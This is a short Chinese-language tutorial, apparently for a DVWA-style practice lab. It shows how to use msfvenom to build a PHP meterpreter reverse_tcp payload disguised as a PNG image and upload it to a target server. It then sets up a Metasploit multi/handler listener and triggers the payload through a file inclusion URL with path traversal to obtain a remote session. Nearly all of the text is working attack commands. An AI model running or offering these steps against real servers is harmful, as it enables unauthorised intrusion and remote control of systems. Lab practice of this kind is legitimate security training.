msfvenom工具介绍
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
用msfvenom生成一个PHP语言的PNG图片木马
代码:msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机地址 lport=端口号 >> any.png
将PNG图片上传到服务器
在终端输入msfconsole进入控制台,然后输入以下命令
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 端口号
set lhost 攻击机地址
exploit
在地址栏输入以下的地址并回车
靶机地址/vulnerabilities/fi/?page=…/…/hackable/uploads/any.png,将msfconsole控制台就有生成一条会话
通过命令查看一下/hackable/uploads上传木马文件目录内容
